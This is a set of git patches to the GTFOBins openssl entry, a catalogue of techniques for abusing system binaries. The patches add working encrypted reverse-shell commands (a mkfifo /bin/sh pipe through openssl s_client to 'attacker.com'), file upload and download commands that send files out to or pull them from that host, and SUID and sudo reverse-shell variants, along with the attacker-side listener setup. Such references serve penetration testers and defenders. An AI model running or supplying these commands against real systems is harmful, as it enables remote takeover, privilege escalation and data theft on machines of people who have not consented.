From cdb4576c85c5300bddedc60b96aca69c1615dc48 Mon Sep 17 00:00:00 2001 From: Roman Mueller Date: Tue, 5 Mar 2019 09:37:52 +0100 Subject: [PATCH 1/4] Add reverse-shell, file-upload and file-download. --- _gtfobins/openssl.md | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index 107b0f6..5c7721c 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -1,5 +1,25 @@ --- functions: + reverse-shell: + - description: Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted. + code: | + RHOST=attacker.com + RPORT=12345 + mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s + file-upload: + - description: Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE" + file-download: + - description: Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE" file-write: - code: | LFILE=file_to_write From e1a02558ecd1e70ab9768a4713ca370824a56a62 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 6 Mar 2019 13:53:52 +0100 Subject: [PATCH 2/4] Refactor openssl descriptions --- _gtfobins/openssl.md | 24 +++++++++++++++++++++--- 1 file changed, 21 insertions(+), 3 deletions(-) diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index 5c7721c..e3e77d0 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -1,20 +1,38 @@ --- functions: reverse-shell: - - description: Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted. + - description: | + To receive the shell run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 + + Communication between attacker and target will be encrypted. code: | RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s file-upload: - - description: Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file. + - description: | + To collect the file run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save + + Send a file to a TCP port, transmission will be encrypted. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE" file-download: - - description: Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file. + - description: | + To send the file run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send + + Fetch a file from a TCP port, transmission will be encrypted. code: | RHOST=attacker.com RPORT=12345 From 60af77428871e806695f85601d8a85f97bb53ac4 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 6 Mar 2019 13:54:16 +0100 Subject: [PATCH 3/4] Add -no_ign_eof to exit nicely when possible to openssl --- _gtfobins/openssl.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index e3e77d0..7e0e424 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -11,7 +11,7 @@ functions: code: | RHOST=attacker.com RPORT=12345 - mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s + mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s file-upload: - description: | To collect the file run the following on the attacker box: @@ -24,7 +24,7 @@ functions: RHOST=attacker.com RPORT=12345 LFILE=file_to_send - openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE" + openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE" file-download: - description: | To send the file run the following on the attacker box: From 58e517563c70c5fa65e52714680d7ba7747342ae Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 6 Mar 2019 14:08:42 +0100 Subject: [PATCH 4/4] Add suid/sudo accordingly to openssl --- _gtfobins/openssl.md | 26 +++++++++++++++++++++++--- 1 file changed, 23 insertions(+), 3 deletions(-) diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index 7e0e424..3f0dc35 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -52,11 +52,31 @@ functions: LFILE=file_to_read openssl enc -in "$LFILE" suid: + - description: | + To receive the shell run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 + + Communication between attacker and target will be encrypted. + code: | + RHOST=attacker.com + RPORT=12345 + mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s + - code: | LFILE=file_to_write echo DATA | openssl enc -out "$LFILE" sudo: - - code: | - LFILE=file_to_write - echo DATA | sudo openssl enc -out "$LFILE" + - description: | + To receive the shell run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 + + Communication between attacker and target will be encrypted. + code: | + RHOST=attacker.com + RPORT=12345 + mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s ---